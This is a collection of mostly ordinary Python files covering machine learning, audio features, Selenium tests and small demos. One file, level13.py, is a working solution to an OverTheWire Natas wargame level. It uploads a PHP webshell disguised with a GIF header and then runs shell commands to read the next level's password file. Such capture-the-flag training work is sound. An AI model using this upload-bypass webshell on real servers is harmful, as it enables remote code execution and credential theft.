            object_loc = config["upper_circle"]["object_location"]
            self.objects.add_object(
                file="experiments/aggregation/images/greyc2.png", pos=object_loc, scale=[225, 225], obj_type="site"
            )
            object_loc = config["lower_circle"]["object_location"]
            self.objects.add_object(
                file="experiments/aggregation/images/greyc2.png", pos=object_loc, scale=[225, 225], obj_type="site")
        # Spawn bounds derived from the arena center.
        # NOTE(review): 1000 is hard-coded here even for the stages whose
        # obstacle is scaled to [800, 800] — confirm this is intended.
        min_x, max_x = area(object_loc_main[0], 1000)
        min_y, max_y = area(object_loc_main[1], 1000)
        # add agents to the environment
        for index, agent in enumerate(range(num_agents)):
            # Rejection-sample coordinates until they fall inside the bounds.
            coordinates = generate_coordinates(self.screen)
            while (
                    coordinates[0] >= max_x
                    or coordinates[0] <= min_x
                    or coordinates[1] >= max_y
                    or coordinates[1] <= min_y
            ):
                coordinates = generate_coordinates(self.screen)
            self.add_agent(Cockroach(pos=np.array(coordinates), v=None, cockroach=self, index=index))
| true |
43cce93464ea311bc20abd0efb34a0bf519c276f | Python | wxl789/python | /day13/04-通过实例对象去修改类属性.py | UTF-8 | 326 | 3.40625 | 3 | [] | no_license |
class People(object):
    """Demo class with a single class attribute shared by all instances."""
    address = "杭州"  # class attribute (shared default)
# Demonstrate reading and shadowing a class attribute through an instance.
print(People.address)
# Create an instance; attribute lookup falls back to the class attribute.
p = People()
print(p.address)
# Assigning through the instance creates an INSTANCE attribute that shadows
# the class attribute; the class-level value is untouched.
p.address = "北京"
print(p.address)
print(People.address)
# Deleting the instance attribute re-exposes the class attribute.
del p.address
print(p.address)
# Rebinding the class attribute is again visible through the instance.
People.address = "北京"
print(p.address)
| true |
a5f9904bf61e431e57abe225424f211a3d34822e | Python | saTan-Y/Machine-Learning | /xgboost/xgboost_wine_data.py | UTF-8 | 1,260 | 2.890625 | 3 | [] | no_license | #!/usr/bin/python
# -*- coding:utf-8 -*-
import time
import numpy as np
import pandas as pd
from sklearn.linear_model import LogisticRegression
import xgboost as xgb
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
if __name__ == '__main__':
    # Compare logistic regression against xgboost on the UCI wine dataset.
    t0 = time.time()
    # Column 0 is the class label (1/2/3); remap to 0-based integer ids.
    df = pd.read_csv('14.wine.data', dtype=float, header=None)
    df[0] = df[0].map({1.0: 0, 2.0: 1, 3.0: 2}).astype(int)
    x, y = df.values[:, 1:], df.values[:, 0]
    # 50/50 train/test split, fixed seed for reproducibility.
    x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.5, random_state=1)
    # Baseline: L2-regularized logistic regression.
    lr = LogisticRegression(penalty='l2')
    lr.fit(x_train, y_train.ravel())
    y_pred1 = lr.predict(x_test)
    rate1 = accuracy_score(y_test, y_pred1)
    # xgboost: shallow trees, multiclass softmax over the 3 classes.
    train_data = xgb.DMatrix(x_train, label=y_train)
    test_data = xgb.DMatrix(x_test, label=y_test)
    params = {'max_depth': 2, 'eta':0.2, 'silent': 0, 'objective':'multi:softmax', 'num_class': 3}
    # Evaluation sets reported on each boosting round.
    watch_list = [(test_data, 'eval'), (train_data, 'train')]
    bst = xgb.train(params, train_data, num_boost_round=10, evals=watch_list)
    y_pred2 = bst.predict(test_data)
    rate2 = accuracy_score(y_test, y_pred2)
    print('lr rate', rate1)
    print('xgboost rate', rate2)
    print('Elapsed time is', time.time()-t0)
| true |
54185f21e09dfb5be50c2c1798b33f20937b924f | Python | BungPeerapat/face_detector | /object_detector/detector.py | UTF-8 | 2,916 | 2.78125 | 3 | [
"MIT"
] | permissive | import numpy as np
import cv2
from sklearn.externals import joblib
from . import MODEL_PATH
from skimage.feature import hog
from .utils import sliding_window, pyramid, non_max_suppression, rgb2gray
class Detector:
    """Sliding-window HOG object detector over an image pyramid.

    Each window is classified by the pickled model loaded from MODEL_PATH
    (must expose ``predict`` on rows of HOG features); overlapping hits are
    merged with non-maximum suppression.
    """
    def __init__(self, downscale=1.5, window_size=(178, 218), window_step_size=20, threshold=0.4):
        # Pre-trained classifier for HOG feature vectors.
        self.clf = joblib.load(MODEL_PATH)
        self.downscale = downscale                # pyramid scale factor per level
        self.window_size = window_size            # (width, height) of the sliding window
        self.window_step_size = window_step_size  # window stride in pixels
        self.threshold = threshold                # overlap threshold passed to NMS
    def detect(self, image):
        """Detect objects in `image`.

        Returns (clone_before_nms, clone_after_nms): two copies of the input
        with the raw and the NMS-filtered bounding boxes drawn on them.
        """
        clone = image.copy()
        # HOG is computed on the grayscale image.
        image = rgb2gray(image)
        # list to store the detections, as (x1, y1, x2, y2) in original coords
        detections = []
        # current scale of the image (exponent of self.downscale)
        downscale_power = 0
        # downscale the image and iterate
        for im_scaled in pyramid(image, downscale=self.downscale, min_size=self.window_size):
            # if the width or height of the scaled image is less than
            # the width or height of the window, then end the iterations
            if im_scaled.shape[0] < self.window_size[1] or im_scaled.shape[1] < self.window_size[0]:
                break
            for (x, y, im_window) in sliding_window(im_scaled, self.window_step_size,
                                                    self.window_size):
                # Skip partial windows at the image border.
                if im_window.shape[0] != self.window_size[1] or im_window.shape[1] != self.window_size[0]:
                    continue
                # calculate the HOG features
                feature_vector = hog(im_window)
                X = np.array([feature_vector])
                prediction = self.clf.predict(X)
                if prediction == 1:
                    # Map window coordinates back to the original resolution.
                    x1 = int(x * (self.downscale ** downscale_power))
                    y1 = int(y * (self.downscale ** downscale_power))
                    detections.append((x1, y1,
                                       x1 + int(self.window_size[0] * (
                                           self.downscale ** downscale_power)),
                                       y1 + int(self.window_size[1] * (
                                           self.downscale ** downscale_power))))
            # Move the the next scale
            downscale_power += 1
        # Display the results before performing NMS
        clone_before_nms = clone.copy()
        for (x1, y1, x2, y2) in detections:
            # Draw the detections
            cv2.rectangle(clone_before_nms, (x1, y1), (x2, y2), (0, 255, 0), thickness=2)
        # Perform Non Maxima Suppression
        detections = non_max_suppression(np.array(detections), self.threshold)
        # NOTE: drawn directly on `clone` (no extra copy needed here).
        clone_after_nms = clone
        # Display the results after performing NMS
        for (x1, y1, x2, y2) in detections:
            # Draw the detections
            cv2.rectangle(clone_after_nms, (x1, y1), (x2, y2), (0, 255, 0), thickness=2)
        return clone_before_nms, clone_after_nms
| true |
728b0e1eb025f88d217ed1a495f2799fade3b459 | Python | tcompa/scripts | /python/importance_sampling.py | UTF-8 | 996 | 3.53125 | 4 | [] | no_license | #!/usr/bin/python
'''
program: importance_sampling.py
created: 2015-09-09 -- 18 CEST
author: tc
notes: takes samples from the probability distribution Q(x), and computes
average observables for the probability distribution P(x)
'''
import numpy
def obs(a):
    '''
    The observable under study: O(x) = x**2 (vectorized over numpy arrays).
    '''
    squared = a ** 2
    return squared
def P(a):
    '''
    Target density: zero-mean Gaussian with sigma = 1.
    '''
    sigma = 1.0
    z = a / sigma
    return numpy.exp(-0.5 * z ** 2) / (numpy.sqrt(2.0 * numpy.pi) * sigma)
def Q(a):
    '''
    Proposal density: zero-mean Gaussian with sigma = 2.
    '''
    sigma = 2.0
    z = a / sigma
    return numpy.exp(-0.5 * z ** 2) / (numpy.sqrt(2.0 * numpy.pi) * sigma)
N = 10000000 # number of samples per estimator
xP = numpy.random.normal(0.0, 1.0, N) # samples drawn from P (sigma = 1)
xQ = numpy.random.normal(0.0, 2.0, N) # samples drawn from Q (sigma = 2)
# Direct Monte Carlo averages under each distribution (Python 2 prints).
print '< obs(x) >_P: %f' % obs(xP).mean()
print '< obs(y) >_Q: %f' % obs(xQ).mean()
# Importance sampling: reweight Q-samples by P/Q to recover the P-average.
print '< obs(y) * P(y) / Q(y) >_Q: %f' % (obs(xQ) * P(xQ) / Q(xQ)).mean()
| true |
434299119fdc0807a3562c580d5538c3072cdf20 | Python | TailoredAccessTeam/wargames | /natas/natas/level13.py | UTF-8 | 1,863 | 2.640625 | 3 | [] | no_license | #!/usr/bin/python
# coding: utf-8
from requests.auth import HTTPBasicAuth
import requests
import sys
import re
def remove_str(the_string):
    """Strip every occurrence of the "GIF29a" magic-byte marker from a string."""
    marker = "GIF29a"
    return the_string.replace(marker, "")
def exploit(level13pass):
    # Solve OverTheWire Natas level 13: upload a PHP webshell whose first
    # bytes are "GIF29a" so it passes the server's image-signature check,
    # then use it to read the level-14 password.  Python 2 (print statement).
    print "{+} Natas Level 13. Doing magic..."
    try:
        # PHP payload disguised as a GIF; evaluates request parameter "1".
        files = {"uploadedfile": "GIF29a<?php eval($_REQUEST[1]);"}
        data = {"filename": "hax.php"}
        r = requests.post(url="http://natas13.natas.labs.overthewire.org/", auth=HTTPBasicAuth('natas13', level13pass), files=files, data=data)
    except Exception:
        print "{-} Something fucked up, request failed. Bailing. Maybe your password was wrong?"
        return None
    # Scrape the server-assigned path of the uploaded shell from the reply.
    shell_path = re.findall("The file <a href=\"(.*?)\"", r.text)
    shell_path = shell_path[0]
    try:
        # Sanity check: run a few shell commands through the webshell.
        data = {"1": "system('id;uname -a;whoami;pwd');"}
        r = requests.post(url="http://natas13.natas.labs.overthewire.org/%s" %(shell_path), auth=HTTPBasicAuth('natas13', level13pass), data=data)
    except Exception,e:
        print "{-} Something fucked up, request failed. Bailing. Maybe your password was wrong?"
        print e
        return None
    print remove_str(r.text)
    try:
        # Read the next level's password file.
        data = {"1": "system('cat /etc/natas_webpass/natas14');"}
        r = requests.post(url="http://natas13.natas.labs.overthewire.org/%s" %(shell_path), auth=HTTPBasicAuth('natas13', level13pass), data=data)
    except Exception,e:
        print "{-} Something fucked up, request failed. Bailing. Maybe your password was wrong?"
        print e
        return None
    # Strip the leading GIF marker echoed back with the command output.
    return remove_str(r.text.strip())
    #return None
def main(args):
    # CLI entry point: expects exactly one argument, the level-13 password.
    if len(args) != 2:
        sys.exit("use: %s level13password" %(args[0]))
    level14pass = exploit(args[1])
    if level14pass != None:
        print "{$$} Level 14 Password is: %s" %(level14pass)
if __name__ == "__main__":
    main(args=sys.argv)
| true |
0eef50b4705f91e644a2d8b8bf9d7c4104f6b4ac | Python | dhruboroy29/TestPythonProject | /audio_tests/melspec_librosa.py | UTF-8 | 3,213 | 2.59375 | 3 | [] | no_license | import librosa
import numpy as np
import soundfile as sf
import sys
import resampy
import os
import progressbar
# Mapping from acoustic-scene label (derived from the audio file-name prefix)
# to the integer class index stored as the first element of each feature row.
CLASS_TO_INT = {
    'bus': 0,
    'busystreet': 1,
    'office': 2,
    'openairmarket': 3,
    'park': 4,
    'quietstreet': 5,
    'restaurant': 6,
    'supermarket': 7,
    'tube': 8,
    'tubestation': 9
}
def compute_logmelspecs(fname, sr, output_dir, flatten=False):
    # Compute log-mel spectrograms over overlapping 1-second windows of the
    # audio file *fname* (resampled to *sr* Hz, downmixed to mono) and save
    # them, with the class label prepended to each flattened row, as
    # <output_dir>/<basename>.npy.  The class label is looked up in
    # CLASS_TO_INT from the file-name prefix (basename minus its last two
    # characters).  `flatten` is currently unused.
    # NOTE: Python 2 code (`xrange`); `librosa.logamplitude` was removed in
    # librosa 0.6 (replaced by `power_to_db`) -- presumably an old librosa
    # version is pinned; confirm before running.
    basename = os.path.basename(fname).split(os.extsep)[0]
    output_path = os.path.join(output_dir, basename)
    audio, sr_orig = sf.read(fname, dtype='float32', always_2d=True)
    # Downmix to mono by averaging channels.
    audio = audio.mean(axis=-1)
    if sr_orig != sr:
        audio = resampy.resample(audio, sr_orig, sr)
    hop_size = 0.1  # seconds between successive 1-second frames
    hop_length = int(hop_size * sr)
    frame_length = sr * 1  # one second of samples
    audio_length = len(audio)
    if audio_length < frame_length:
        # Make sure we can have at least one frame of audio
        pad_length = frame_length - audio_length
    else:
        # Zero pad so we compute embedding on all samples
        pad_length = int(np.ceil(audio_length - frame_length)/hop_length) * hop_length \
                     - (audio_length - frame_length)
    if pad_length > 0:
        # Use (roughly) symmetric padding
        left_pad = pad_length // 2
        right_pad= pad_length - left_pad
        audio = np.pad(audio, (left_pad, right_pad), mode='constant')
    # Divide into overlapping 1 second frames
    x = librosa.util.utils.frame(audio, frame_length=frame_length, hop_length=hop_length).T
    # Get class label
    class_label = np.array([CLASS_TO_INT[basename[:-2]]])
    # Compute log-melspecs in each slice
    logmelspec = []
    for row in xrange(np.shape(x)[0]):
        y=x[row]
        #Compute log-melspecs on each window
        n_fft = 2048
        # n_win = 480
        # n_hop = n_win//2
        n_mels = 256
        n_hop = 242
        S = librosa.feature.melspectrogram(y, sr=sr, n_fft=n_fft, n_mels=n_mels, hop_length=n_hop).T
        # Convert to log scale (dB). We'll use the peak power as reference.
        log_S = librosa.logamplitude(S, ref_power=np.max)
        # Reshape as a 1-D array
        log_S = log_S.ravel()
        # Concatenate class label as first element
        log_S = np.concatenate((class_label,log_S))
        logmelspec.append(log_S)
    #np.savez_compressed(output_path, X=logmelspec, y=class_label)
    np.save(output_path, logmelspec)
    # Test read
    read = np.load(output_path+'.npy')
    print('ReadTest')
if __name__=="__main__":
    # Batch driver: convert every file in the input directory (sys.argv[1])
    # to log-mel feature files, mirroring 'audio' -> 'logmelspec_<sr>KHz'
    # in the output path.  Python 2 (`print` statements; note target_sr/1000
    # is integer division here, yielding 48).
    #in_path = '/Users/Balderdash/Downloads/dcase2013/audio/fold1'
    in_path = sys.argv[1]
    target_sr = 48000
    out_path = in_path.replace('audio', 'logmelspec_'+str(target_sr/1000)+'KHz')
    if not os.path.exists(out_path):
        os.makedirs(out_path)
    audio_files = os.listdir(in_path)
    print 'Input directory:', in_path, '\n'
    bar = progressbar.ProgressBar(maxval=len(audio_files), \
        widgets=[progressbar.Bar('=', '[', ']'), ' ', progressbar.Percentage()])
    bar.start()
    n_iter=1
    for file in audio_files:
        compute_logmelspecs(os.path.join(in_path, file), target_sr, out_path)
        bar.update(n_iter)
        n_iter += 1
bar.finish() | true |
ae4143808b95e40e770703bc0ea9e390cbc146ed | Python | createnewdemo/istudy_test | /爬虫进阶/定位frame.py | UTF-8 | 797 | 2.8125 | 3 | [] | no_license | from selenium import webdriver
# Selenium demo: locating and entering an <iframe> on douban.com.
driver_path = r'E:\pycharm\chromediver\chromedriver.exe'
driver = webdriver.Chrome(executable_path=driver_path)  # driver can now control the browser
driver.get('https://www.douban.com/')
driver.implicitly_wait(10)
# Four ways to switch into a frame:
# from selenium import webdriver
# driver = webdriver.Firefox()
# driver.switch_to.frame(0)  # 1. locate by frame index; the first frame is 0
# driver.switch_to.frame("frame1")  # 2. locate by id
# driver.switch_to.frame("myframe")  # 3. locate by name
# driver.switch_to.frame(driver.find_element_by_tag_name("iframe"))  # 4. locate via a WebElement object
# The Douban login form lives inside an iframe, so switch into it first (way 4).
driver.switch_to.frame(driver.find_element_by_xpath('//*[@id="anony-reg-new"]/div/div[1]/iframe'))
# Toggle the "remember me" checkbox inside the frame.
tag = driver.find_element_by_xpath('//*[@id="account-form-remember"]')
tag.click()
print(tag)
| true |
d0268bceb5ec5037024c2f8bd510d589916f4825 | Python | pantelisantonoudiou/SAKE | /backend/create_user_table.py | UTF-8 | 2,031 | 3.484375 | 3 | [
"MIT"
] | permissive | ### ----------------- IMPORTS ----------------- ###
import pandas as pd
import numpy as np
### ------------------------------------------- ###
# Create dropdown column elements
# Columns rendered as dropdowns in the Dash DataTable, and the option set for
# each (parallel sequences: drop_options[i] belongs to dropdown_cols[i]).
# NOTE(review): drop_options entries are Python sets, so option ordering in
# the UI is not guaranteed -- use lists/tuples if a fixed order matters.
dropdown_cols = ['Source', 'Search Function']
drop_options =[{'total_channels', 'file_name', 'channel_name', 'comment_text'},
               {'contains', 'startswith', 'endswith', 'number', 'exact_match'}]
def dashtable(df):
    """
    Prepare *df* for a Dash DataTable.

    Returns a (columns, dataframe, dropdown) triple: `columns` is the
    column-spec list (columns listed in the module-level `dropdown_cols`
    get a 'dropdown' presentation), `df` is passed through unchanged, and
    `dropdown` maps each dropdown column to its non-clearable option list
    taken from the module-level `drop_options`.
    """
    # Column specs for the DataTable.
    column_specs = []
    for col in df.columns:
        spec = {'name': col, 'id': col}
        if col in dropdown_cols:
            spec.update({'presentation': 'dropdown'})
        column_specs.append(spec)

    # Dropdown option lists, one entry per dropdown column.
    dropdown_spec = {}
    for col, options in zip(dropdown_cols, drop_options):
        choices = [{'label': item, 'value': item} for item in options]
        dropdown_spec[col] = {'options': choices, 'clearable': False}

    return column_specs, df, dropdown_spec
def add_row(df):
    """
    Append one blank row to *df*.

    Every cell of the new row is an empty string except the last column,
    which defaults to 'all'.  Returns a new DataFrame with a fresh
    0..n-1 index.

    PARAMETERS
    ----------
    df: pd.DataFrame

    OUTPUT
    ----------
    df: pd.DataFrame, with one added row
    """
    blank = np.empty([1, len(df.columns)], dtype = object)  # one empty row
    blank[:] = ''        # fill every cell with an empty string
    blank[0][-1] = 'all' # last column defaults to 'all'
    append_df = pd.DataFrame(blank, columns = df.columns)
    # DataFrame.append was deprecated in pandas 1.4 and removed in 2.0;
    # pd.concat(ignore_index=True) is the supported equivalent.
    df = pd.concat([df, append_df], ignore_index=True)
    return df
if __name__ == '__main__':
df = pd.read_csv('example_data/default_table_data.csv')
dash_cols, df, drop_dict = dashtable(df)
print(drop_dict) | true |
12f31ac586e8456040b015c93dd558678a9c1a83 | Python | faizan352/Ecommers_selenium_Project | /testCases/test_login.py | UTF-8 | 1,210 | 2.640625 | 3 | [] | no_license | import pytest
from selenium import webdriver
from pageObjects.LoginPage import LoginPage
class Test_001_Login:
    # UI smoke tests for the nopCommerce admin demo site.  Relies on a
    # pytest `setup` fixture (defined elsewhere) that yields a Selenium
    # WebDriver, and on the LoginPage page-object.
    baseURL = "https://admin-demo.nopcommerce.com/"
    username = "admin@yourstore.com"
    password = "admin"
    def test_homePageTitle(self, setup):
        # Verify the login page title; take a screenshot on mismatch.
        self.driver = setup
        self.driver.get(self.baseURL)
        act_title = self.driver.title
        if act_title == "Your store. Login":
            assert True
            self.driver.close()
        else:
            self.driver.save_screenshot(".\\Screenshots\\" + "test_homePageTitle.png")
            self.driver.close()
            assert False
    def test_login(self, setup):
        # Log in through the page object and verify the dashboard title.
        self.driver = setup
        self.driver.get(self.baseURL)
        lp = LoginPage(self.driver)
        lp.setUserName(self.username)
        lp.setpassword(self.password)
        lp.clickLogin()
        act_title = self.driver.title
        if act_title == "Dashboard / nopCommerce administration":
            assert True
            self.driver.close()
        else:
            self.driver.save_screenshot(".\\Screenshots\\" + "test_login.png")
            self.driver.close()
            assert False
if __name__ == '__main__':
pytest.main() | true |
eacea05731d5c3c5c7121ab02751cba767695605 | Python | jeecha/pytest-intro | /parametrize/test_parametrize.py | UTF-8 | 371 | 3.453125 | 3 | [] | no_license | import pytest
def sum(a, b):
    """Return a + b.  (Deliberately shadows the builtin ``sum`` in this module.)"""
    total = a + b
    return total
# use pytest.mark.parametrize to provide multiple sets of arguments
# to the test method; each tuple becomes one independent test case.
@pytest.mark.parametrize("a, b, expected", [(2, 5, 7), (10, 20, 30)])
def test(a, b, expected):
    # Exercises the module-local `sum` above.  The test method is called
    # twice with:
    # a=2, b=5, expected=7
    # a=10, b=20, expected=30
assert sum(a, b) == expected
| true |
7a9878611fad4267647a1a5173068e60aa3191e2 | Python | AnlaAnla/Python_priject | /untitled8/LeafItem/Flops.py | UTF-8 | 1,857 | 2.8125 | 3 | [] | no_license | import tensorflow.keras as keras
from tensorflow.keras import Model, Input, Sequential
from tensorflow.keras.layers import Dense, Flatten, Conv2D, MaxPooling2D, Dropout
from keras_flops import get_flops
# build model
# build model
# inp = Input((32, 32, 1))
# x = Conv2D(32, kernel_size=(3, 3), activation="relu")(inp)
# x = MaxPooling2D(pool_size=(2, 2))(x)
# x = Flatten()(x)
# x = Dense(128, activation="relu")(x)
# out = Dense(10, activation="softmax")(x)
# model = Model(inp, out)
# # build model
# build model
# inp = Input((32, 32, 1))
# AlexNet-style Sequential model used only to measure its FLOPs with
# keras_flops.get_flops.  Several conv blocks of the original AlexNet are
# commented out below -- presumably a slimmed-down experiment; the name
# 'AlexNet_03' suggests iteration 3 of that experiment.
IMAGE_SIZE = (150, 150)
classes = 16
model_alex = keras.Sequential(name='AlexNet_03')
model_alex.add(keras.layers.InputLayer(input_shape=IMAGE_SIZE + (3,)))
model_alex.add(
    Conv2D(64, (11, 11), strides=(4, 4), padding='valid', activation='relu', kernel_initializer='uniform'))
model_alex.add(MaxPooling2D(pool_size=(3, 3), strides=(2, 2)))
model_alex.add(
    Conv2D(150, (5, 5), strides=(1, 1), padding='same', activation='relu', kernel_initializer='uniform'))
model_alex.add(MaxPooling2D(pool_size=(3, 3), strides=(2, 2)))
# model_alex.add(
#     Conv2D(192, (3, 3), strides=(1, 1), padding='same', activation='relu', kernel_initializer='uniform'))
# model_alex.add(
#     Conv2D(192, (3, 3), strides=(1, 1), padding='same', activation='relu', kernel_initializer='uniform'))
# model_alex.add(
#     Conv2D(150, (3, 3), strides=(1, 1), padding='same', activation='relu', kernel_initializer='uniform'))
model_alex.add(MaxPooling2D(pool_size=(3, 3), strides=(2, 2)))
model_alex.add(Flatten())
model_alex.add(Dense(256, activation='relu'))
model_alex.add(Dense(128, activation='relu'))
model_alex.add(Dense(classes, activation='softmax'))
print(model_alex.summary())
# FLOPs for a single-sample forward pass.
flops = get_flops(model_alex, batch_size=1)
print(f"flops: {flops / 10 ** 9:.03} g")
| true |
3b0a6d7ee252f0a62e3c3b65d97449b829c79187 | Python | cafaray/atco.de-fights | /isBeautifulString.py | UTF-8 | 799 | 3.453125 | 3 | [] | no_license | import re
def isBeautifulString(inputString):
    """
    Return True when the letter frequencies of *inputString* are
    non-increasing from 'a' to 'z': 'b' may occur no more often than 'a',
    'c' no more often than 'b', and so on.  Characters outside 'a'-'z' are
    ignored, matching the original per-letter counting.

    Replaces the original implementation, which sorted and rebuilt the
    string, ran a regex findall per letter and carried dead variables
    (`previo`, `esPrimero`) plus debug prints.
    """
    counts = [inputString.count(chr(code)) for code in range(ord('a'), ord('z') + 1)]
    # Reject as soon as any letter occurs more often than its predecessor.
    for prev, cur in zip(counts, counts[1:]):
        if cur > prev:
            return False
    return True
98c3da574f5eedfb3d62b0157ae94cef16364a70 | Python | tuffing/adventofcode2018 | /scaffolding/standard.py | UTF-8 | 522 | 2.859375 | 3 | [] | no_license | #!/usr/bin/python3
import sys
sys.path.append('../')
from scaffolding import common
class Solution(object):
    # Template solution class for an Advent of Code day; `common` (imported
    # above) supplies the input-loading helpers.
    #inputNumbers = common.pullNumbersFromList(inputList, True) #True = include signs, False: all numbers are positive
    def __init__(self):
        pass
    def solution(self, inputList):
        # Placeholder: implement the day's puzzle logic here.
        print('Solution Here')
        return 1
    def run(self):
        # Load the puzzle input from input.txt and run the solution.
        inputList = common.loadInput('input.txt', True) #True = split, False = string
        print('Advent Day: X')
        self.solution(inputList)
if __name__ == '__main__':
Solution().run()
| true |
ddd8253745e8d51438997c0d54383d98c0b5e73f | Python | jessicagamio/longest_substring | /longest_substring.py | UTF-8 | 1,445 | 3.65625 | 4 | [] | no_license | import unittest
def lengthOfLongestSubstring(s):
    """
    Return the length of the longest substring of *s* that contains no
    repeating characters.

    Uses the standard O(n) sliding-window technique instead of the
    original dictionary-of-substrings bookkeeping (which stored every
    candidate substring and scanned them all at the end).
    """
    last_seen = {}   # character -> index of its most recent occurrence
    start = 0        # left edge of the current repeat-free window
    best = 0
    for idx, ch in enumerate(s):
        # If ch already appears inside the window, slide the left edge
        # just past its previous occurrence.
        if ch in last_seen and last_seen[ch] >= start:
            start = last_seen[ch] + 1
        last_seen[ch] = idx
        best = max(best, idx - start + 1)
    return best
class TestFunction(unittest.TestCase):
    # Regression cases for lengthOfLongestSubstring.
    def test_meth(self):
        self.assertEqual(lengthOfLongestSubstring("pwwkew"),3)
        self.assertEqual(lengthOfLongestSubstring(" "),1)
        self.assertEqual(lengthOfLongestSubstring("ae"),2)
        self.assertEqual(lengthOfLongestSubstring("dvdf"),3)
        self.assertEqual(lengthOfLongestSubstring("anviaj"),5)
if __name__ == "__main__":
unittest.main()
| true |
c3e928de0b457de3299947bd8391130cd4d6857b | Python | RSarmento/tcc | /pre_process/controller/analyser.py | UTF-8 | 550 | 3.65625 | 4 | [] | no_license | def analyse_classes(classes_novas, classes_existentes):
    # Case-insensitive comparison of every new class name against every
    # existing one, collecting the names that appear in both lists.
    iguais = 0  # number of matching (classe, classe_existente) pairs
    diferentes = 0  # number of NON-matching pairs
    dados_iguais = set()
    for classe in classes_novas:
        for classe_existente in classes_existentes:
            if classe.lower() == classe_existente.lower():
                iguais += 1
                dados_iguais.add(classe)
                print('%s e %s' % (classe, classe_existente))
            else:
                diferentes += 1
    # NOTE(review): both counters count *pairs* from the cartesian product,
    # not distinct classes -- `diferentes` grows by roughly
    # len(classes_existentes) per new class.  Confirm this is intended.
    print('Existem %s classes iguais e %s classes diferentes' % (iguais, diferentes))
print(dados_iguais)
| true |
ff2d95b151f0ffec36ef272213b7f052131a5c88 | Python | LazyMammal/GetTopCommentsReddit | /get_all_posts.py | UTF-8 | 1,053 | 2.671875 | 3 | [] | no_license | import time
import praw
# generator function for subreddit posts (top + new + hot + gilded)
# note: timestamp search is no longer part of reddit api
# note: yielded posts are unique (duplicates are discarded)
def get_all_posts(subreddit):
    # Yield unique submissions from *subreddit*, drawn from the top, new,
    # hot and gilded listings (up to 1000 each -- the reddit API ceiling).
    # Credentials come from the 'get_top_comments' praw site config.
    reddit = praw.Reddit(site_name='get_top_comments',
                         user_agent='Get all subreddit posts, by LazyMammal v 0.1') # , log_requests=1)
    sr = reddit.subreddit(subreddit)
    post_limit = 1000
    post_id_cache = set()  # ids already yielded, to dedupe across listings
    for gen in [sr.top, sr.new, sr.hot, sr.gilded]:
        for post in gen(limit=post_limit):
            if post.id not in post_id_cache:
                post_id_cache.add(post.id)
                yield post
def main():
    # debug output: dump all attributes of the first Submission found.
    # Python 2 print statements.
    for post in get_all_posts('saved'): # /r/saved is a small subreddit
        if isinstance(post, praw.models.reddit.submission.Submission):
            print post
            for k in post.__dict__.keys():
                print '\t', k, str(post.__dict__[k])
        break
if __name__ == "__main__":
main()
| true |
276df1dae0fa6e3e68c0e34635cfb3d8ccad5222 | Python | diunko/awesome-algorithms-course | /00-ti-1260/take2.py | UTF-8 | 388 | 2.859375 | 3 | [] | no_license |
import sys
NN, = [int(i) for i in sys.stdin.readline().strip().split()]
D0 = [0, 1, 1, 2, 4, 6, 9, 14]
D = [None] * 100
for i in xrange(len(D0)):
D[i] = D0[i]
M = len(D0)
def gen(N):
global M
if N < M:
return D[N]
else:
g = gen(N-1) + gen(N-3) + 1
D[M] = g
M+=1
return g
def main(N):
for i in xrange(1, N):
gen(i)
return gen(N)
print main(NN)
| true |
5300cc28ee2bd1ca597449827865bdf182fc96b9 | Python | Cedric9352/Core-Python-Programming-Exercise | /6th/deblank.py | UTF-8 | 242 | 3.8125 | 4 | [] | no_license | str_input = raw_input('Enter a string: ')
str_list = list(str_input)
while True:
if(str_list[0] == ' '):
str_list.pop(0)
elif(str_list[-1] == ' '):
str_list.pop()
else:
break
print ''.join(str_list)
| true |
25acc19fc06621b43ca3af4b267c0739e8acff81 | Python | sammienjihia/data_science | /iter_tools.py | UTF-8 | 1,066 | 4.25 | 4 | [] | no_license | # The zip() function, takes any number of iterables as it's function and returns tuples of it's
# iterable elements
# zip() pairs up the i-th element of every input iterable and yields tuples;
# the result length equals that of the SHORTEST input.
arg1 = list(zip([1,2,3,4], ['a','b','c','d'], ['nyef', 24, 'bb', 'a'], [1,'q', 'op'], [1]))
print(arg1)
arg2 = list(zip([1,2,3,4], ['a','b','c','d'], ['nyef', 24, 'bb', 'a']))
print(arg2)
# NB: zip stops as soon as any input iterator is exhausted -- arg1 above has
# a single tuple because its shortest input, [1], has one element.
# map() applies its first argument (a function) to each item obtained by
# iterating its second argument, lazily, until that iterator is exhausted.
arg3 = list(map(len, ['cat', 'doggy', 'kaleodoscope']))
print(arg3)
"""
Since iterators are iterable, you can compose zip() and map() to produce an iterator over combinations of elements
in more than one iterable. For example, the following sums corresponding elements of two lists:
"""
arg4 = list(map(sum,zip([1,3,5,7],[3,4,6,7])))
print(arg4) | true |
162b8d4fa7592a38c41b8299a7358bdc27f9d9fd | Python | sam-hunt/hash-backup | /src/logger.py | UTF-8 | 2,560 | 3.328125 | 3 | [] | no_license | """
Create a logger which writes messages to both the screen and a logfile.
The logfile can be either a rotating logfile or continuous.
"""
import time
import logging
import logging.handlers
# import os.path
__author__ = 'Giovanni Moretti'
PROGRAM_NAME = "myBackup"
# LOG_FILENAME = os.path.join(os.path.dirname(os.path.abspath(__file__)), PROGRAM_NAME + '.log')
CONSOLE_LOG_LEVEL = logging.ERROR # Only show errors to the console
FILE_LOG_LEVEL = logging.INFO # but log info messages to the logfile
logger = logging.getLogger(PROGRAM_NAME)
logger.setLevel(logging.DEBUG)
# ====================================================================================
# FILE-BASED LOG
# Create formatter and add it to the handlers
logger.formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
# formatter = logging.Formatter('%(levelname)s - %(message)s')
logger.fh, logger.ch = None, None
def add_handling(log_filename):
    """Attach two handlers to the module-level `logger`: a file handler
    writing to *log_filename* with the detailed timestamped format, and a
    console handler printing the bare message.  The handlers are stashed on
    logger.fh / logger.ch for later access; note this also rebinds
    logger.formatter to the simpler console format as a side effect."""
    # LOGFILE HANDLER - SELECT ONE OF THE FOLLOWING TWO LINES
    logger.fh = logging.FileHandler(log_filename) # Continuous Single Log
    # fh = logging.handlers.RotatingFileHandler(LOG_FILENAME, backupCount=5) # Rotating log
    logger.fh.setLevel(FILE_LOG_LEVEL)
    logger.fh.setFormatter(logger.formatter)
    logger.addHandler(logger.fh)
    # logger.handlers[0].doRollover() # Roll to new logfile on application start
    # Add timestamp
    # logger.info('\n---------\nLog started on %s.\n---------\n' % time.asctime())
    # =================================================================================
    # CONSOLE HANDLER - can have a different log-level and format to the file-based log
